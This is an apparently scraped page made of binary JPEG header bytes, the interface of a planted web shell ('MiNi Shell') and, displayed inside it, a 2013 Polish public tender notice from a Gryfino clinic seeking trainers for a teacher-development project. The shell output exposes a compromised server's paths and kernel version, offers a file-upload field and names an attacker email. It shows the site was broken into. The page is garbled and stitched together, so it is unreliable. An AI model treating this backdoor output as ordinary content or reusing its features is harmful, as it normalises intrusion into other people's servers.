JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131113/461950-N-2013.html

<p class="kh_header"><b>Gryfino: Wybór ekspertów wspierających proces wspomagania  w szkołach i przedszkolach oraz prowadzących spotkania w sieci współpracy i samodoskonalenia w ramach projektu Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez zmodernizowany system doskonalenia nauczycieli w powiecie gryfińskim.</b><br>
<b>Numer ogłoszenia: 461950 - 2013; data zamieszczenia: 13.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Łużycka 91, 74-100 Gryfino, woj. zachodniopomorskie, tel. 91 416 27 37, faks 91 416 27 37.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ppp_gryfino@poczta.onet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór ekspertów wspierających proces wspomagania  w szkołach i przedszkolach oraz prowadzących spotkania w sieci współpracy i samodoskonalenia w ramach projektu Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez zmodernizowany system doskonalenia nauczycieli w powiecie gryfińskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie spotkań (warsztatów, wykładów konsultacji grupowych i indywidualnych) w ramach procesu wspomagania szkół i przedszkoli powiatu gryfińskiego oraz prowadzenie spotkań w ramach czterech sieci współpracy i samokształcenia nauczycieli w ramach projektu pn. Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez zmodernizowany system doskonalenia nauczycieli w powiecie gryfińskim. 
Projekt jest współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół (nr umowy o dofinansowanie UDA-POKL.03.05.00-00-219/12-00 z dnia 15 października 2013r). 
Celem projektu jest podniesienie jakości funkcjonowania systemu doskonalenia nauczycieli poprzez stworzenie planów wspomagania spójnych z rozwojem szkół w obszarach wymagających wsparcia w roku szkolnym 2013/2014 i 2014/2015 oraz podniesienie jakości współpracy dyrektorów i nauczycieli poprzez organizację sieci współpracy i samokształcenia. 
Projekt obejmie wsparciem 35 placówek z terenu powiatu gryfińskiego, tj. 10 przedszkoli, 18 szkół podstawowych, 6 szkół gimnazjalnych i 1 szkoła ponadgimnazjalna (technikum). Każda z instytucji wybierze po 2 oferty doskonalenia w okresie realizacji projektu.

Zadania projektu: 

Zadanie nr 1.

Przeprowadzenie pełnego cyklu doskonalenia w każdej szkole/przedszkolu w oparciu o dwie oferty doskonalenia (jedna w roku szkolnym 2013/2014  i jedna w 2014/2015).

Oferty doskonalenia:
1)	Jak pomóc uczniowi osiągnąć sukces edukacyjny?
2)	Ocenianie kształtujące
3)	Techniki uczenia się i metody motywujące do nauki
4)	Uczeń - aktywny uczestnik procesu uczenia się
5)	Wykorzystanie EWD w ewaluacji wewnętrznej szkoły
6)	Oferta edukacyjna drogą do właściwej realizacji podstawy programowej
7)	Wspieranie pracy wychowawców klas - bezpieczna szkoła  
8)	Postawy uczniowskie. Jak je kształtować?                                                                                   
9)	Budowa koncepcji pracy szkoły                                                                                                         
10)	Praca z uczniem młodszym                                                                                                        
11)	Praca z uczniem zdolnym
12)	Praca z uczniem o specjalnych potrzebach edukacyjnych
13)	Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet 
14)	Projekt edukacyjny w szkole
15)	Współpraca szkoły ze środowiskiem lokalnym
16)	Rodzice są partnerami szkoły
17)	Nauczyciel 45+
18)	Szkoła promuje wartość edukacji
19)	Doradztwo edukacyjno-zawodowe w szkole
20)	Efektywna organizacja pracy zespołów nauczycielskich
21)	Współpraca nauczycieli w prowadzeniu procesów edukacyjnych
22)	Jak efektywnie wykorzystać wyposażenie i warunki lokalowe szkoły?
23)	Jak i po co prowadzić ewaluacje wewnętrzną?
24)	Pierwszy/drugi rok pracy dyrektora szkoły

Zamawiający informuje, że na dzień wszczęcia postępowania przetargowego nie ma jeszcze wybranych ofert doskonalenia. Zamawiający dokona wyboru ofert (do końca listopada 2013r.) po zakończeniu warsztatów diagnostycznych w szkołach i przedszkolach w których jest realizowany projekt. 
Cały okres zamówienia obejmuje następujące zadania wspierające proces wspomagania szkół i przedszkoli:
1)	Eksperci wspierający proces wspomagania w szkołach i przedszkolach - warsztaty. Max. liczba godzin w ramach tego zadania wynosi 672 godz. 
2)	Eksperci wspierający proces wspomagania w szkołach i przedszkolach - konsultacje. Max. liczba godzin w ramach tego zadania wynosi 144 godz. 
3)	Eksperci wspierający proces wspomagania w szkołach i przedszkolach - wykłady. Max. liczba godzin w ramach tego zadania wynosi 144 godz. 

Spotkania ekspertów będą się odbywały w szkołach i przedszkolach na terenie powiatu gryfińskiego. Sale na realizację wsparcia ekspertów udostępni się Wykonawcy nieodpłatnie. Wydruk materiałów szkoleniowych zapewnia Zamawiający. Wykonawca jest zobowiązany do zabezpieczenia merytorycznej realizacji warsztatów, wykładów, konsultacji na najwyższym poziomie dla wszystkich grup odbiorców (nauczycieli). Zamawiający wskazuje termin realizacji spotkań eksperckich zgodnie z Rocznym Planem Wspomagania. Terminy wskazuje Szkolny Organizator Rozwoju Edukacji (SORE), po konsultacji z koordynatorem projektu.

Zadanie nr 2.

W ramach projektu powstaną 4 sieci współpracy i samodoskonalenia, w tym jedna dla dyrektorów szkół i placówek. W okresie realizacji projektu planuje się po 4 spotkania w 4 sieciach współpracy i samokształcenia na każdy rok szkolny). W każdej sieci uczestniczyć będzie 20-25 nauczycieli.

Temat sieci dla dyrektorów:
1) Sieć współpracy i samokształcenia dla dyrektorów
Tematy sieci dla nauczycieli:
1) Praca z uczniem /dzieckiem/ młodszym.
2) Uczeń, sprawiający problemy wychowawcze, też może osiągnąć sukces.
3) Jak rozwijać twórcze myślenie uczniów.

Zamawiający informuje, że na dzień wszczęcia postępowania przetargowego nie ma jeszcze wybranych tematów sieci. Zamawiający dokona wyboru tematów sieci  do końca listopada 2013r.                                                       
Cały okres zamówienia obejmuje następujące zadanie wspierające pracę sieci współpracy i samodoskonalenia:
1)	Eksperci wspierający spotkania sieci współpracy i doskonalenia. Max. liczba godzin w ramach tego zadania wynosi 64 godz. (32 godz. w roku 2013/2014 i 32 godz. w roku szkolnym 2014/2015).

Spotkania sieci współpracy i samodoskonalenia nauczycieli odbywać się będą na terenie powiatu gryfińskiego. Sale na spotkania sieci udostępni się Wykonawcy nieodpłatnie. Wydruk materiałów szkoleniowych zapewnia Zamawiający. Wykonawca jest zobowiązany do zabezpieczenia merytorycznej realizacji warsztatów, wykładów, konsultacji na najwyższym poziomie dla wszystkich grup odbiorców (nauczycieli). Zamawiający wskazuje termin spotkań sieci zgodnie z planem pracy sieci. Terminy wskazuje Koordynator Sieci (KS), po konsultacji  z koordynatorem projektu.
Obowiązki Wykonawcy:

1)	zapewnienie trenerów, szkoleniowców, wykładowców, konsultantów, ekspertów w danych dziedzinach do realizacji rocznych planów wspomagania (RPW) i spotkań sieci;
2)	przesyłanie SORE, KS oraz koordynatorowi projektu, wersji elektronicznych materiałów szkoleniowych/wykładowych wykorzystywanych w ramach eksperckiego wsparcia szkół i przedszkoli oraz na potrzeby prowadzenia spotkań sieci (z obowiązującymi logami);
3)	prowadzenie warsztatów, konsultacji, wykładów oraz spotkań sieci  w terminach ustalonych przez SORE, KS w konsultacji z koordynatorem projektu;
4)	zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia;
5)	zorganizowanie sprzętu i wszelkich pomocy dydaktycznych niezbędnych  do realizacji zadania na swój własny koszt;
6)	przedłożenie programu zajęć oraz materiałów szkoleniowych w wersji elektronicznej SORE, KS i koordynatorowi projektu na co najmniej 5 dni przed ustalonym terminem szkolenia/spotkania celem uzgodnienia i wydruku. 
7)	prowadzenie odpowiedniej dokumentację w postaci: listy obecności, kwestionariusze (testy) badające kompetencje przed i po szkoleniu, ankietę ewaluacyjną na zakończenie każdego szkolenia/spotkania, program szkolenia obejmujący cele ogólne, cele szczegółowe, treści podzielone na moduły, zalecaną literaturę;
8)	przekazanie Zamawiającemu (tzn. SORE, KS lub innej uprawnionej osobie z kadry zarządzającej) bezpośrednio po formie doskonalenia, a najpóźniej  w ciągu 5 dni roboczych oryginały dokumentów, o których mowa w pkt 7;
9)	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo POKL, logotyp Unii Europejskiej (dwanaście złotych pięcioramiennych gwiazd na błękitnym tle) wraz z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego, hasło promocyjne Programu Kapitał Ludzki-Człowiek - najlepsza inwestycja, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL oraz logo Powiatu Gryfińskiego i logo Poradni Psychologiczno-Pedagogicznej w Gryfinie.

Wykonawca musi wykazać, że dysponuje lub będzie dysponował na czas realizacji zamówienia ekspertami, którzy będą uczestniczyć w wykonaniu niniejszego zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi, doświadczeniem i wykształceniem niezbędnym do jego wykonania, tj posiadającymi co najmniej: 
- wykształcenie wyższe II stopnia, 
- wiedzę w obszarach dedykowanych określonym odbiorcom oraz w tematach (ofertach doskonalenia i tematach sieci), 
- doświadczenie w szkoleniu nauczycieli..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Analiza dokumentów potwierdzających posiadanie aktualnego wpisu do rejestru placówek kształcenia ustawicznego, której zadania statutowe obejmują doskonalenie osób dorosłych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Analiza dokumentów potwierdzających wykonanie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, co najmniej 1 usługi w zakresie usług szkoleniowych na rzecz nauczycieli bądź osób dorosłych (pełnoletnich)  o wartości nie mniejszej niż 50.000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku: 
Analiza dokumentów potwierdzających dysponowanie:
- 24 osobami (dotyczy ofert doskonalenia), które będą uczestniczyć w wykonaniu niniejszego
zamówienia, 
- 4 osobami (dotyczy sieci), które będą uczestniczyć w wykonaniu niniejszego zamówienia,
legitymującymi się odpowiednimi kwalifikacjami zawodowymi, doświadczeniem i wykształceniem
niezbędnym do jego wykonania, tj. posiadającymi , co najmniej:
- wykształcenie wyższe II stopnia, 
- wiedzę w obszarach dedykowanych określonym odbiorcom oraz w tematach (ofertach doskonalenia i tematach sieci), 
- doświadczenie w szkoleniu nauczycieli.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca składa wraz z ofertą, pełnomocnictwo do reprezentowania Wykonawcy o ile nie wynika to z innych dokumentów. 

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie złożonych dokumentów wymaganych na podstawie przepisów ustawy PZP w tym zakresie, wg formuły spełnia, nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian: 
1. Na podstawie i w granicach art. 144 ust. 1 PZP Zamawiający dopuszcza możliwość zmiany umowy o zamówienie zawartej w stosunku do treści ofert, na podstawie której dokonano wyboru wykonawcy. Zmiana nastąpi wyłącznie w drodze aneksu do umowy, którego przedmiot stanowić mogą następujące okoliczności (warunki zmiany umowy): 
a) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
b) zmiany osób występujących po stronie Zamawiającego i Wykonawcy w przypadku wystąpienia zdarzeń losowych.
c) w uzasadnionych sytuacjach np. gdy ze względu na dłuższą nieobecność osoby prowadzącej wskazanej w ofercie (macierzyństwo, choroba, itp. zdarzenia losowe) bądź gdy osoba prowadząca nie spełni oczekiwań merytorycznych uczestników spotkań - Zamawiający może wyrazić zgodę, na zmianę osób wskazanych w ofercie do prowadzenia zajęć w ramach RPW/sieci, jednakże o kwalifikacjach i doświadczeniu nie mniejszym niż określone w warunkach udziału w postępowaniu,
d) sposobu i okresu fakturowania usług,
e) zaistnieją inne zdarzenia pod warunkiem, że nie spowoduje to zmian w przedmiocie zamówienia.
f) gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawcą stroną w szczególności Instytucją Pośredniczącą.
g) gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych i zaleceń dotyczących POKL.
h) Zmiany miejsca świadczenia usługi w przypadku, gdy Zamawiający nie będzie mógł z przyczyn losowych zapewnić miejsca wykonania przedmiotu zamówienia wskazanego w umowie z przyczyn od siebie niezależnych, a jednocześnie będzie miał możliwość zapewnienia innego miejsca świadczenia usługi.
i) inne niż wskazane w ust. a-h okoliczności, jeżeli w stosunku do zawartej umowy będą korzystne dla zamawiającego, np. zastosowanie innych sposobów wykonania zamówienia bez zmiany wysokości wynagrodzenia, 
i) aktualizacja rozwiązań z uwagi na zmiany obowiązujących przepisów odnoszących się do tego zamówienia, 
k) zmiany tekstu umowy, jeżeli nie będą miały wpływu na treść ustalonych w umowie zobowiązań stron,
l) zmiana stawki podatku VAT.
2. Postanowienia ust. 1 nie będą stanowiły dla żadnej ze stron zawartej umowy zobowiązania do zawarcia aneksu (obie strony muszą zgodzić się na zawarcie aneksu)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ppp_gryfino@poczta.onet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno-Pedagogiczna w Gryfinie przy ul. Łużyckiej 91, w sekretariacie - pok. nr 103.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 11:30, miejsce: Zabezpieczoną ofertę należy złożyć w terminie do dnia 22 listopada 2013r. do godz. 11.30 w Poradni Psychologiczno-Pedagogicznej w Gryfinie przy ul. Łużyckiej 91, w sekretariacie - pok. nr 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół (nr umowy o dofinansowanie UDA-POKL.03.05.00-00-219/12-00 z dnia 15 października 2013r)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com